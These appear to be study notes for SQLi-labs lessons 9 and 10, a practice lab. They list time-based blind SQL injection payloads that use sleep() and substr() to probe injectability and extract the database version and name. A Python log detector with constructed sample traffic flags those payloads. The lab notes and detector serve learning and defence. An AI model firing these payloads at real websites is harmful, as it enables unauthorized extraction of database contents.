SQLi-labs: Lesson-9
Time-based SQLi.
Basic query to detect SQLi (if the parameter is injectable, the response is delayed by about 10 seconds):
?id=1' and sleep(10)--+
Get version
?id=1' and if(substr(version(),1,1)=5, sleep(10),null)--+
Get database
?id=1' and if(substr(database(),1,1)='s', sleep(10),null)--+
- Use the same approach to get table names and column names.
SQLi-labs: Lesson-10
Time-based SQLi.
Similar to Lesson-9, but uses a double quote instead of a single quote.
?id=1" and sleep(10)--+
?id=1" and if(substr(version(),1,1)=5, sleep(10),null)--+
?id=1" and if(substr(database(),1,1)='s', sleep(10),null)--+
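
Seen from the server side, the Lesson-9 and Lesson-10 requests leave a clear trace: a quote breakout followed by sleep() in the id parameter, and a response time that matches the requested delay whenever the database actually evaluated the injected expression. The detector below is an added example, not part of the original notes; the log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (not real traffic): client, request line, status, seconds taken.
SAMPLE_LOG = """\
203.0.113.7 "GET /Less-9/?id=1 HTTP/1.1" 200 0.004
203.0.113.7 "GET /Less-9/?id=1%27%20and%20sleep(10)--+ HTTP/1.1" 200 10.012
203.0.113.7 "GET /Less-9/?id=1%27%20and%20if(substr(database(),1,1)=%27s%27,%20sleep(10),null)--+ HTTP/1.1" 200 10.009
203.0.113.7 "GET /Less-9/?id=1%27%20and%20if(substr(database(),1,1)=%27a%27,%20sleep(10),null)--+ HTTP/1.1" 200 0.005
203.0.113.9 "GET /Less-10/?id=1%22%20and%20sleep(10)--+ HTTP/1.1" 200 10.020
198.51.100.4 "GET /search?q=how+to+sleep+better HTTP/1.1" 200 0.030
"""

LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
# The delay call used by the payloads on this page: sleep(<seconds>)
DELAY_RE = re.compile(r"\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.IGNORECASE)
# A single or double quote closing the string context, followed by AND/OR
BREAKOUT_RE = re.compile(r"""['"]\s*(?:and|or)\b""", re.IGNORECASE)

def classify(line):
    """Return a finding for a request carrying a time-based payload, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    client, target, _status, seconds = m.groups()
    url = urlsplit(target)
    # parse_qsl percent-decodes each value and turns '+' into a space
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        delay = DELAY_RE.search(value)
        if delay and BREAKOUT_RE.search(value):
            # A response at least as slow as the requested sleep means the
            # database evaluated the injected expression (endpoint is injectable).
            executed = float(seconds) >= float(delay.group(1))
            return {"client": client, "path": url.path, "param": name,
                    "verdict": "delay-observed" if executed else "attempt"}
    return None

def scan(log_text):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "delay-observed" verdict is the one to escalate: it shows the query is built by string concatenation and should be replaced with a parameterized statement, while "attempt" only shows that the payload was sent.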